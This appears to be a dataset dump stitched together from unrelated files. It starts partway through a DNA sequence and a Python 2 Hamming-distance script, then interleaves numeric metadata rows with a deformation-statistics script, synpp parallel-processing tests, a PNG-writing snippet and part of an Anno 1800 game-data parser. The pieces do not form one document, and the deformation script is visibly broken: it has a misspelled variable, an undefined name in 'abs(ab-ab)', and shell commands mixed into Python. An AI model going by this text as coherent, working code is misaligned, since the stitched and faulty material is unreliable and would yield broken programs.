CGCCTGGCAACGATTCCCAGCATGTCCACTAGGAGTTCAAGTCAGGTAGAAACTCCTGCATCAATATAGGATGCGGATCTTTGTCTCGGACATGTACTCGACAGTTGAGCTGGTCATCTTCCAAAGCTAAAACTGGGCGCTAACGGGGGTTGGGGAGACGGTACTTCTGGCGGTTTCGAGCAAGGTTGATAGACGACATGCGCTGGCTTGGGGAAGTGGCTCGCCATTGATGCATCATTGACGCGGCCTAAGAGGGGTCGGAGCTGTACTTTTAGGGCTGCACGGTAGATCCTAACAGTCATTTCTTTGAACCAGAGGAGCAGCTAAACTAGCACCTCCCACTGCTGACCCTGCTGTGTGGATTTGGCTTGGGCCGGTCAACTATCCTGCTCTCTAACATCGGGTACTATATTCCTCGCCTCGAGACGAAGTTTATCTGCCGGAGGCTCGTACGGACCGCAACTGGTAGCTTGATCGTTAGGAATCTTTTCACTTGGAAACTGTCGTACCGTGGAGAGTTAGCGATTTTATTGAGGGGACAGAAGTTGCCCCACCCTACATGTAACTCTTGGTTTATTGGTCTACGTGATAGTAACGTTGGATGATGCATCATTGGCTCATCATCACTTGACGTAGGTTAGACGTCCAGTGACGTCGATGGTATATACCTCTCTCTGCCACGGTGTGTTCGGTAGCTCTTGTCATCAGGGGCTACGCTAAGACATTTTGGTGTCCAATCTGTCCGTCCTGGTAGATCGCTAGCGCTCTAAGGCGTTTGTTCTCCCTGCTGCATTAAAGAATCTAGATGTTTGTCGAGTAAGTCTTGCTGGACAGGACCTGCGGGACTTGGTGACTTAGAGCTCGTAACGTAATACGTTACACTGTTACAACGATAAATACTTCACACTAACAATACACCTTTTGAACCGGCCAAAGCGAACGGGTTCGGGTACAATCTTTGTGCCTAAGGAACCCTGTACCTGCAGTGCTCGTTGCCCACCATCGGAAAGTTCGGAATCCAGTTCGAACTTCCGTGTTTACGATACAGCCACAGGGTGCCGCAAGATCCGGGCTACGTTTAGGGGTGTTTAAGTTATGATGAGGATCAGCAACCCAAAGCGCCGTTCCAAAATGAATGATGCATCTCCTCAAAGGAAGAGTGAACGTCGCGCCGACACTACATTTAGTGAGGTTCCGTGATAGAGCACGTAACATGACAATAAGCGAGAAAAGTCGCTGTCGTAGGCCTGAGCCGTACTGTCCTTCTCTCCTTTGGAGGAAATATTTAGCCTTTTAGAAGAGGACGTCCAGAGGGTGACAGATGGTCTGACTGCGAGTGTGAGTGAACCTGAACAACTTCGTGCGCTAATGTTTGAACCACAAACAGGCAGGTGACCACCATGTTTTGCAAGTATCTCCGGTCAGTAATGTCTTGCTTTCGTGACGCTGGGCATCTCCGTAGCAACCTCCGAATGAGTAGGTCCATTGTCAGCGAGTTCGAATTCGTATAGTCGTCCACTGCAGACTCGGGACGGTAATGAAGCTGACTATCGCCAAGGTTGTAATATGTTTCGGAATAACCGTAGAGCCTTCCGTGCACTCGGTAGCTGGTCTGGCAGGTTGAGGTTGCCGGTCTTACATATAAGTACCCTACCCAGCATGAGCAGCGTCTGCTACCAAGAGGTTTTAAAGTACGGCGGCACCACTCAATTGAGTCATTACCTGCCAGTGATATCTAGGGAGGAGTTCTAGGTATAGATTGCCGGACGCTTAGTGTAAGCCTAGCTATGCGCAGCCACATCTAGAGTTGCAAAGTCTGGTCCTCGTCAAATCAAGGGGCCGCTGTGTATTTCTCCAGGAACTCATGAGCCACCTGAAGCACGCTCGCCCGACTCGCACTATAGGTATCTGGGCGTGGTCTTTGGTCTCAATATACCGCAATGCCTCTCTGCGAACATGACGGGGACAAGTCATTCGCGACCATCATCGGCACCGCTAGGAATCGACAGACGCCGCATTAGAGCCATCCAAAAGGAACTACAATTAGCATCTACTGTTAGTTGTTCTTCACGTGGAAGGCGGTGTGGTGCCGAGGTGCGGATAGCATGGTAACTTTATTTTCCGATGCCCCAGAAGTCTAAAGCACGGCGCACGCTACTGTGAGGGCTTACCCTACAGGTTATTCTTCGACTCCCCAATCGCGATAAGGTCGCACCGCATCTGCTCCCGTGCCTCCATAACCTGGTTCCTCAGGCCAAGGCGTTTGATTGGAGACCTAGTCTGTTTATGTAGTGGTTGATTCTGGAAAAACTGCCTACAAAAGGACTTCTAGGACATAGAGCGTGCATACCGATAGTAAGCGCGGCGGGAAACAAACTCTCATGTGTGCGTAACGCAAAATCCTTGGTTTTTGCTAGCTAAGGGGCCAGGTCCGCAGGCCAAACCCCAGCCCATCGAGGTCAAGCAGTACGCCGGACTCGATACGGAACTTGTGGTTCTCGTATCAGGCTTGCCAATCCTTCAGGTCGTCTACGGCAACTACACCCTTCCCGCAACCGTGGAGTCAACCAAATGAAGACCTCTGAGTTTTTCGGATCAGCTCGTTGGGACTATCGATTAAGCAAGTTGTGAAAGGGACTCCCTCTCGGTCCAGCATGATCTCCCTCATTCATTATTTGTAAACAATGCTCTTCGGACGGAAGCCTCGCGTACCTTTGGCCATTTAGCTTGTTGCGGAATCCAAAGGCGCCGGCAGTCAGACCCTGTGTCCACGTAAGGTGGCGCGACAATGTCGTCAACTCTTGCTAGTTCTTCTTCATTGGTTGCGGATTTTAATTAACTGCACTATGCCTATTCGCGTCTCACCGATGCACATTGCGTGTCCCGTTCTTCGAGCCAGACGAATATTGTAATCCAAACAGTCGCCGGTAGCGCATCATCTACTTGGGGTCAAGGAATAGGTTAGGGTGAGGTGTACACTCTGTTTCGTGGAAGATGCCCGTGAAGGGGTTCATGGGGTAGTGGGCGGGACGACACAGGTCGTCACCAAAAGTTAAGAATCCCTCAAATCCTAATTGAGCGTTCCCCATGTGTTTTCCTTATGGTCGCCGAGCTCATTGTCTTGTGCCCGATATAAGCGCGGCCAGACGTACAAATGTCCTAGTGCTTGATGCGCCAGCCGAGTGGTCGATATTACTCTACCAAATAATCATTTGCCGTCAGAATATTCCTAACTTTCATCACACGTTTTAACGCACCACCGACGTGCTGGAAGTGGACGCTTTAGGCGGGGGCCTTTCTCGGTTTGTAATGTAACAGTAATGGGCTAAAGCGGTGAACGCATTTCAGGGCACTGAGAAACTGCATGGTAATACCGCAGAGCGGTAGAGGGCAGGTTAACGAGTGCGGACAAGCCGGCAACTATCCTCAAACGAGTAGGAGTGTTTTGAAGCAATCTCCTTCTAGGCTGACCCCATTGAGTTTGTTCGACTGCCACAGATGCCGTGTCGAGTTGAAGTCAACGGCCGTCTCTTGCGATCGGTGCGACGATTAGCAGCTTAGAGCACTTCCGTCCAGCAGTAAAGCGGGAAGGCCTTTTTAGACAGTAATTTGCGCTGAGTACTATAATAACTAACCTTAACGCCTTCAATTAAACGAGAGCAATCTGTCTGAAATCACTACTCTGTCATCATAGTGTGGCGAGGACGTCGGTTGACCCGCCTTGGAGTGAGCTGGTAATGCTTACATTGTCTAATTGACATATGATGGAGGAAAGTGACTTATTGTTCGACTGATGCAGGCTCTCAAATTGGCCACTCCACTTTGCCGACGGCGGTCTAGCCTAGATCTTACATTGTCTGGTTTCAAACCGAGCTCATTGGTTGAGACGCCTTATCATGAGTCGTCCTTAGCAGTCAGCTACGATCTCGCGAACGCCCCAAGGGAGTTAAGCATCTTGGAGGTAGCACATGTTCGTAGTTGAAACCGACTCCTACAGTGTGTCAGAAAGGGAAGCCCTAAAGTCGGACGATACCCTTTGGGTTACAATATAATAGCATTCCCTAATACATGTTACCAATCCTGCCCGGCCGGCGGTGGGGCGTCGGCTTGATGATTGTCATCCACTCGATCTATACACATCGCCTGTGGCTACACCAGTACGCCACTACTGGTACGATGCCTATGTCGCGCACAAGGTGGCAGTTATTACCCCCAAGATAAGGGTCGGCATGACTTGGCGTGTTGTATTGGTGTTGTGTGCCTCCTCTCAGACGGTTTATGTTAGGCACAGAGAGTTGGGGTAGGCGAATACATTGTTCTCTCCTGAATCGCACTGCCAGACTGAGCGGCAGATAGCAACCTATACGCCCCTTGGCCTAACTTCAAGAAGAAGTGCGCATACAGTCGATAGTAGGGGTCTGAGAGATTAGCTCCTTATTGCTCCAAGCCTTCTAAATCGATTACGTATACCTGTAGATAGTGCGGTGTCGTCTGGTAGTTGCTCATCTACAGGGCGTTCAGGTGCTTTGTCCAACCGCTCAGATCCTAACCACTGTGCCCAGTCACTGGGTAACACGCTTTCAGTAGACCAAGGGTTGTGCGAGTTACCTTTATCTCTAGACCGTCAGCCACGACCATGTGAAAGATGAATGTATGTGCTTGCTTGACCCTCTCATGGTAGACGGCGACTTACGATTGTCTACACCACCTGCCTTAAGCTGGGTTAGGAGCCTCAAGTGACAATTGGGTGCCGTTACGTAATGACCACCCAGAAACATGGACGATGACGGATGCATACATTGGACGCACCCCGATAGGTCATAAGGGTTAGCCTGATTCCAGAATAACATACCAACCTGCAAATGGTAGCAGTATCGAATAACGCTTCTGATAACAGGTATTTTACAAATGCGCCAGAGTAGCTCACCACGTTCTACACGCGACTTACCCTCCTTTGTAAGGACATGGACTGAGTTAGGACCACTTGATCGGGTAAAGGATGAAGTCAGGCTTATGCCAACGTTCTAAGTCCTGTGGTTGGGTAGTTCCTTACGACGTCAGTTCGGGTGGAGCCGCTAGTCGTTGGCCTTACTGGAGACAGCGTTCATTGCCTTTCATCTCTCCGGGATATTGACTGCACCAGTCGTACTCCGCTCCAGAACAACAGGAGAGAGCTACAAGTCGACTCCGACCAGCACCTCACCCTTTATGATCTGCTGGTAAACTCCCGCAGAGCGGTGTCCCGTAACGTAATGAATTGCGCTGAAAATGGAAGAATCCCGTCAGGTCAAGCTAGGGAGATCAAAACAACCCTGCAGCTTAGTCGAACGGTTGTATTCCAGATAGGTAAACATAGAGGATACAAAGCATTCGAAACAGGAAGCGTTCCAATTTGGTTGGGTCTAATTCTGACCCCTATTCCGTGGGCTTCCTTTGAGAACCAATGCGGCAGACTTCGGTTAAAATAGACAACCCCTAAGCGGATGGTTAGGGTGCGTGGTGTTCGGTAGGCCCGACGAGGACACGTGAACGGCATAAACGTGACCGTCCTAGGAGACGATATGCGCAAAGGCCAGTACCCGTGAGGTATTGTGGGAATAACAGACGCTAGCAGTGGAATGTCAATAAAGCTTCGACCGGCGTGTAGAGTACTAGCGACGTTTAGCCGCGGCTCGGTATACATAGTAGGTCTGGAAATGTGGTTTGCAGAACTTCGTCGTCACCTCTGTCGTTGAAGAATAAACACTGAGTAATCGACATTGTGAATTGGGCGGAGCAGTGTGAATATAGACATTGAACTGAGTTGATGCGTTATCCCAGTTTCGGTTAGCGGTCGCTTTACAGAAGGGACACGTGGAGCAGCGCACTCACAGATCTCGCCGTAAGCGCGCAGCCGGAGCGAGCTATCAGTAGGGGAAACTCATGGATAACTAAGTCGGACCCGGCCCGGTCCCCGCTAATAATGACTAGACTATCAGTGGTGCCTAATAGAGCACTTCAAATAGTACGTAGCTTATAGGCAGTCCGTGCTTCCTCAAGACTACTGAGAAAGCTTTTCCTACCTCGAGGCTACAAGTGGTGAGAGTCGTGGCCCATTGGAGTAGTGCCTGACCGCCTAACTGTGTTGGGCTCCACGAATCCAGGCGTCCTTACGAGCGCGCATCAGAATCGCAATAATACGCTGGTCCACCGCGGGACATGAACCGCATTATGCCGCAATGGGTCTTCAAAGGTGGCTAGGAGAAGCAGAATAAGAATATTCGGTAGCAAACGGGTCCCTGTGCGGGATGTGTCTGGACCGCTGTC"
mismatch = 6
# Megadja hogy hany darab a kulonbseg a ket string kozott
def hammering_distance(string_kivagott):
counter = 0
for i in range (len(pattern)):
if pattern[i] != string_kivagott[i]:
counter += 1
return counter
for i in range (len(string)-len(pattern)+1):
string_kivagott = string[i:i+len(pattern)]
if hammering_distance(string_kivagott) <= mismatch:
print i,
stop = timeit.default_timer()
print stop - start | 719.227273 | 15,286 | 0.989067 | 76 | 15,823 | 205.815789 | 0.460526 | 0.00358 | 0.002302 | 0.003964 | 0.00179 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000255 | 0.007331 | 15,823 | 22 | 15,287 | 719.227273 | 0.995607 | 0.003476 | 0 | 0 | 0 | 0 | 0.969366 | 0.968796 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.117647 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e857334d5044e1eccdc4b4b62fb56f91ef5b3361 | 3,505 | py | Python | snippets/deformation_statistics.py | pinkieli/nla3d | 7c7d0d63e69608c624924e60a70598e1e363d5cd | [
"MIT"
] | 22 | 2015-03-21T16:19:21.000Z | 2021-05-14T10:50:11.000Z | snippets/deformation_statistics.py | pinkieli/nla3d | 7c7d0d63e69608c624924e60a70598e1e363d5cd | [
"MIT"
] | 22 | 2015-03-05T11:42:05.000Z | 2018-11-30T06:11:12.000Z | snippets/deformation_statistics.py | pinkieli/nla3d | 7c7d0d63e69608c624924e60a70598e1e363d5cd | [
"MIT"
] | 8 | 2015-03-28T11:31:38.000Z | 2021-07-29T16:35:04.000Z | cd /Users/dmitry/gdisk/PHD/nla3d/
ls
cd custom/
ls
less model_lambda_20.txt
%less model_lambda_20.txt
np.genfromtxt?
np.genfromtxt("model_lambda_20.txt",skip_header = True)
M = np.genfromtxt("model_lambda_20.txt",skip_header = True)
shape(M)
his_values = []
his_weight = []
his_values = []
his_weight = []
for i in range(shape(M)[0]):
lambda1 = M[i,2]
lambda2 = M[i,3]
lambda3 = M[i,4]
J = lambda1*lambda2*lambda3
lambda1 = J**(-1.0/3.0)*lambda1
lambda2 = J**(-1.0/3.0)*lambda2
lambda3 = J**(-1.0/3.0)*lambda3
a = linspace(1.0,2.0,100)
y1 = a**(1.0/2.0)-1.0/lamda2
y2 = lambda1/lambda2 - a**(-3.0/2.0)
plot(a,y1)
plot(a,y2)
raw_input("wait..")
i = 1000
lambda1 = M[i,2]
lambda2 = M[i,3]
lambda3 = M[i,4]
J = lambda1*lambda2*lambda3
lambda1 = J**(-1.0/3.0)*lambda1
lambda2 = J**(-1.0/3.0)*lambda2
lambda3 = J**(-1.0/3.0)*lambda3
print lambda1
print lambda2
print lambda3
a = linspace(1.0,2.0,100)
#y1 = a**(1.0/2.0)-1.0/lambda2
#y2 = lambda1/lambda2 - a**(-3.0/2.0)
y1 = a**(1.0/2.0)*lambda2-1
y2 = a**(-3.0/2.0)*lambda1/lambda2-1
plot(a,y1,"r-")
a1 = max([lambda2**(-2), 1.0])
a2 = max([(lambda2/lambda1)**(-2.0/3.0), 1.0])
delta_a = abs(a1-a2)
print "delta_a = " + str(delta_a)
plot([a1],[0.0],'ro')
plot([a2], [0.0], 'ro')
plot(a,y2,"r--")
grid()
title("a,b,c range")
xlabel("a,b,c")
ylabel(">0")
y1 = a**2*lambda2**(-2)-1
y2 = a**(-3)*lambda1*lambda2**2-1
plot(a,y1,"g-")
plot(a,y2,"g--")
b1 = max([lambda2, 1.0])
b2 = max([(lambda1*lambda2**2)**(1.0/3.0),1.0])
delta_b = abs(ab-ab)
print "delta_b = " + str(delta_b)
plot([b1],[0.0],'go')
plot([b2],[0.0],'go')
y1 = (a*lambda2/lambda1)**(-2.0/6.0)*lambda2-1
c1 = 1.0
c2 = lambda2**2*lambda1
delta_c = abs(c1-c2)
print "delta_c = " + str(delta_c)
plot(a,y1,"b-")
plot([c1],[0.0],'bo')
plot([c2],[0.0],'bo')
al = []
bl = []
cl = []
wl = []
for i in range(shape(M)[0]):
lambda1 = M[i,2]
lambda2 = M[i,3]
lambda3 = M[i,4]
J = lambda1*lambda2*lambda3
lambda1 = J**(-1.0/3.0)*lambda1
lambda2 = J**(-1.0/3.0)*lambda2
lambda3 = J**(-1.0/3.0)*lambda3
I1 = lambda1**2+lambda2**2+lambda3**2
wl.append(I1*M[i,1])
#print lambda1
#print lambda2
#print lambda3
a = linspace(1.0,2.0,100)
#y1 = a**(1.0/2.0)-1.0/lambda2
#y2 = lambda1/lambda2 - a**(-3.0/2.0)
y1 = a**(1.0/2.0)*lambda2-1
y2 = a**(-3.0/2.0)*lambda1/lambda2-1
#plot(a,y1,"r-")
a1 = max([lambda2**(-2), 1.0])
a2 = max([(lambda2/lambda1)**(-2.0/3.0), 1.0])
delta_a = abs(a1-a2)
#print "delta_a = " + str(delta_a)
#plot([a1],[0.0],'ro')
#plot([a2], [0.0], 'ro')
#plot(a,y2,"r--")
#grid()
#title("a,b,c range")
#xlabel("a,b,c")
#ylabel(">0")
y1 = a**2*lambda2**(-2)-1
y2 = a**(-3)*lambda1*lambda2**2-1
#plot(a,y1,"g-")
#plot(a,y2,"g--")
b1 = max([lambda2, 1.0])
b2 = max([(lambda1*lambda2**2)**(1.0/3.0),1.0])
delta_b = abs(b1-b2)
#print "delta_b = " + str(delta_b)
#plot([b1],[0.0],'go')
#plot([b2],[0.0],'go')
y1 = (a*lambda2/lambda1)**(-2.0/6.0)*lambda2-1
c1 = 1.0
c2 = lambda2**2*lambda1
delta_c = abs(c1-c2)
#print "delta_c = " + str(delta_c)
#plot(a,y1,"b-")
#plot([c1],[0.0],'bo')
#plot([c2],[0.0],'bo')
al.append(delta_a)
bl.append(delta_b)
cl.append(delta_c)
| 25.035714 | 59 | 0.522111 | 648 | 3,505 | 2.768519 | 0.118827 | 0.035674 | 0.021739 | 0.024526 | 0.875697 | 0.8534 | 0.8534 | 0.8534 | 0.841695 | 0.794872 | 0 | 0.138196 | 0.221683 | 3,505 | 139 | 60 | 25.215827 | 0.519428 | 0.150071 | 0 | 0.557692 | 0 | 0 | 0.039282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2cd58c6ae11ea6679722caeb3aa3019a4b5a37fa | 2,118 | py | Python | tests/test_parallel.py | Nitnelav/synpp | b2b2136a99701ce77fd4fea939f8efb521f67c21 | [
"MIT"
] | 6 | 2020-04-01T12:06:20.000Z | 2021-11-02T19:10:27.000Z | tests/test_parallel.py | Nitnelav/synpp | b2b2136a99701ce77fd4fea939f8efb521f67c21 | [
"MIT"
] | 26 | 2019-12-08T12:25:39.000Z | 2022-02-28T07:24:56.000Z | tests/test_parallel.py | Nitnelav/synpp | b2b2136a99701ce77fd4fea939f8efb521f67c21 | [
"MIT"
] | 8 | 2020-06-19T15:49:46.000Z | 2021-07-06T10:15:37.000Z | from synpp.parallel import ParallelMasterContext, ParalelMockMasterContext
import synpp
def sum_up(context, argument):
return context.data("xyz") + context.config("uvw") + context.config("hij") + argument
def test_parallel():
data = { "xyz": 1200 }
config = { "uvw": 40, "hij": 5 }
arguments = [1000000, 2000000, 3000000]
with ParallelMasterContext(data, config, 3, None) as parallel:
result = parallel.map(sum_up, arguments)
assert result == [1001245, 2001245, 3001245]
with ParallelMasterContext(data, config, 3, None) as parallel:
result = parallel.map_async(sum_up, arguments).get()
assert result == [1001245, 2001245, 3001245]
with ParallelMasterContext(data, config, 3, None) as parallel:
result = list(parallel.imap(sum_up, arguments))
assert result == [1001245, 2001245, 3001245]
with ParallelMasterContext(data, config, 3, None) as parallel:
result = list(parallel.imap_unordered(sum_up, arguments))
assert 1001245 in result
assert 2001245 in result
assert 3001245 in result
def test_mock():
data = { "xyz": 1200 }
config = { "uvw": 40, "hij": 5 }
arguments = [1000000, 2000000, 3000000]
with ParalelMockMasterContext(data, config, 3) as parallel:
result = parallel.map(sum_up, arguments)
assert result == [1001245, 2001245, 3001245]
#with ParalelMockMasterContext(data, config, 3) as parallel:
# result = parallel.map_async(sum_up, arguments).get()
#assert result == [1001245, 2001245, 3001245]
with ParalelMockMasterContext(data, config, 3) as parallel:
result = list(parallel.imap(sum_up, arguments))
assert result == [1001245, 2001245, 3001245]
with ParalelMockMasterContext(data, config, 3) as parallel:
result = list(parallel.imap_unordered(sum_up, arguments))
assert 1001245 in result
assert 2001245 in result
assert 3001245 in result
def test_parallel_stage():
result = synpp.run([
{ "descriptor": "tests.fixtures.parallel_stage" }
])[0]
assert result == [1321, 2321, 3321, 4321, 5321]
| 30.257143 | 89 | 0.681303 | 246 | 2,118 | 5.792683 | 0.215447 | 0.031579 | 0.061754 | 0.084211 | 0.805614 | 0.805614 | 0.805614 | 0.805614 | 0.805614 | 0.805614 | 0 | 0.150595 | 0.206799 | 2,118 | 69 | 90 | 30.695652 | 0.697619 | 0.075071 | 0 | 0.714286 | 0 | 0 | 0.033742 | 0.014826 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.095238 | false | 0 | 0.047619 | 0.02381 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2cdc3210fc2312d848937d2716456510d441c574 | 508 | py | Python | data/textData/pngTest.py | JohnHenryEden/wind3D-custom | f2bd82dc077978d915592993ccbfed77f132f43f | [
"MIT"
] | 1 | 2021-11-14T19:12:44.000Z | 2021-11-14T19:12:44.000Z | data/textData/pngTest.py | JohnHenryEden/wind3D-custom | f2bd82dc077978d915592993ccbfed77f132f43f | [
"MIT"
] | null | null | null | data/textData/pngTest.py | JohnHenryEden/wind3D-custom | f2bd82dc077978d915592993ccbfed77f132f43f | [
"MIT"
] | null | null | null | import png
png.from_array([
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
[255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
], 'RGBA').save("small_smiley.png") | 50.8 | 71 | 0.490157 | 106 | 508 | 2.330189 | 0.09434 | 0.704453 | 0.364372 | 0.582996 | 0.825911 | 0.825911 | 0.825911 | 0.825911 | 0.825911 | 0.825911 | 0 | 0.549865 | 0.269685 | 508 | 10 | 72 | 50.8 | 0.115903 | 0 | 0 | 0.666667 | 0 | 0 | 0.039293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
fa202f36ce0a0510b35c31779b1a726131f8ffac | 36,624 | py | Python | data_parser/template/factories.py | wzy9607/Anno1800CalculatorDataParser | 94581b622c778160f8a3887e119292449cad24f1 | [
"MIT"
] | null | null | null | data_parser/template/factories.py | wzy9607/Anno1800CalculatorDataParser | 94581b622c778160f8a3887e119292449cad24f1 | [
"MIT"
] | null | null | null | data_parser/template/factories.py | wzy9607/Anno1800CalculatorDataParser | 94581b622c778160f8a3887e119292449cad24f1 | [
"MIT"
] | null | null | null | # coding:utf-8
import abc
import bs4
from .building import Building
class Factory(Building):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building> *
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking> * TODO
<DeletePropsRadius>1</DeletePropsRadius>
</Blocking>
<Cost .../> *
<Object> TODO
<Variations>
<Item>
<Filename>data/graphics/buildings/production/agriculture_01/agriculture_01.cfg
</Filename>
</Item>
</Variations>
</Object>
<Mesh /> TODO
<Selection> TODO
<ParticipantMessageArcheType>Resident_tier01_atWork</ParticipantMessageArcheType>
<Colors>
<WeakSelectionColorType>NoColor</WeakSelectionColorType>
</Colors>
</Selection>
<Constructable /> TODO
<Locked /> TODO
<SoundEmitter> TODO
<ActiveSounds>
<Item>
<Sound>214800</Sound>
</Item>
<Item>
<Sound>206376</Sound>
</Item>
</ActiveSounds>
<ConstructionSounds>
<BuildMoveSuccess>
<Item>
<VectorElement>
<InheritedIndex>0</InheritedIndex>
<InheritanceMapV2>
<Entry>
<TemplateName>FarmBuilding</TemplateName>
<Index>0</Index>
</Entry>
</InheritanceMapV2>
</VectorElement>
<Sound>214783</Sound>
</Item>
</BuildMoveSuccess>
</ConstructionSounds>
<MaterialType>Wood</MaterialType>
</SoundEmitter>
<FeedbackController /> TODO
<Infolayer /> TODO
<UpgradeList /> TODO
<RandomDummySpawner /> TODO
<Factory7 .../> *
<FactoryBase .../>
<LogisticNode /> TODO
<Slot .../> TODO
<ModuleOwner> TODO
<ModuleLimit>144</ModuleLimit>
<ConstructionOptions>
<Item>
<ModuleGUID>1010270</ModuleGUID>
</Item>
</ConstructionOptions>
<ModuleBuildRadius>0</ModuleBuildRadius>
<HardFarmsConfig>1</HardFarmsConfig>
</ModuleOwner>
<AmbientMoodProvider> TODO
<AmbientMood>AgricultureBuildingsEurope</AmbientMood>
<Murmur>Farm</Murmur>
<DynamicEnvironmentType>None</DynamicEnvironmentType>
</AmbientMoodProvider>
<Maintenance .../> *
<Attackable> TODO
<MaximumHitPoints>1500</MaximumHitPoints>
<SelfHealPerHealTick>4</SelfHealPerHealTick>
</Attackable>
<FreeAreaProductivity> TODO
<InfluenceRadius>11</InfluenceRadius>
<WorkerUnit>102433</WorkerUnit>
<MaxWorkerAmount>3</MaxWorkerAmount>
<WorkerPause>10000</WorkerPause>
</FreeAreaProductivity>
<IncidentInfectable> TODO
<Infectable>
<Illness>
<Escalated>0</Escalated>
</Illness>
<Explosion>
<Base>0</Base>
<Escalated>0</Escalated>
</Explosion>
</Infectable>
<Explosion>
<ExplosionCoreDamage>1000</ExplosionCoreDamage>
<DamageExplosionChance>0</DamageExplosionChance>
</Explosion>
<IncidentInfectionChanceFactors>
<Fire>
<DensityFactor>0.025</DensityFactor>
<DensityDistance>20</DensityDistance>
<FactoryProductivityFactor>0.1</FactoryProductivityFactor>
<FactoryUndertimeFactor>0.05</FactoryUndertimeFactor>
</Fire>
<Riot>
<FactoryOvertimeFactor>0.4</FactoryOvertimeFactor>
<FactoryUndertimeFactor>0.2</FactoryUndertimeFactor>
<FactoryHappinessFactor>0.2</FactoryHappinessFactor>
<HappinessThreshold>20</HappinessThreshold>
</Riot>
</IncidentInfectionChanceFactors>
</IncidentInfectable>
<Pausable /> TODO
<Culture> TODO
<CultureType>Landscaping</CultureType>
<HasPollution>1</HasPollution>
</Culture>
<IncidentInfluencer> TODO
<Influence>
<Illness>
<Distance>10</Distance>
</Illness>
</Influence>
</IncidentInfluencer>
<Electric /> TODO
<ItemGenerator /> TODO
<QuestObject /> TODO
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
@property
@abc.abstractmethod
def template_name(self):
...
def parse(self):
"""
parse the node, the actual parsers are parse_node_{tag_name}
"""
super().parse()
self.parse_node_factory(self.values_node.Factory7)
self.parse_node_factory_base(self.values_node.FactoryBase)
self.parse_node_maintenance(self.values_node.Maintenance)
def parse_node_factory(self, node: bs4.Tag):
"""
<Factory7>
<NeededFertility>GUID</NeededFertility> some factory requires certain island fertility
</Factory7>
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
:param node: the Factory7 node
"""
if node.NeededFertility:
self.values["needed_fertility"] = int(node.NeededFertility.string)
def parse_node_factory_base(self, node: bs4.Tag):
"""
<FactoryBase>
<FactoryInputs> products that the factory consumes
<Item>
<Product>GUID</Product> * GUID of product
<Amount>NaturalInteger</Amount> * amount consumed per cycle
<StorageAmount>NaturalInteger</StorageAmount> * amount of product that the factory can store
</Item>
...
</FactoryInputs>
<FactoryOutputs> * products that the factory produces
<Item>
<Product>GUID</Product> * GUID of product
<Amount>NaturalInteger</Amount> * amount of product produced per cycle
<StorageAmount>NaturalInteger</StorageAmount> * amount of product that the factory can store
</Item>
...
</FactoryOutputs>
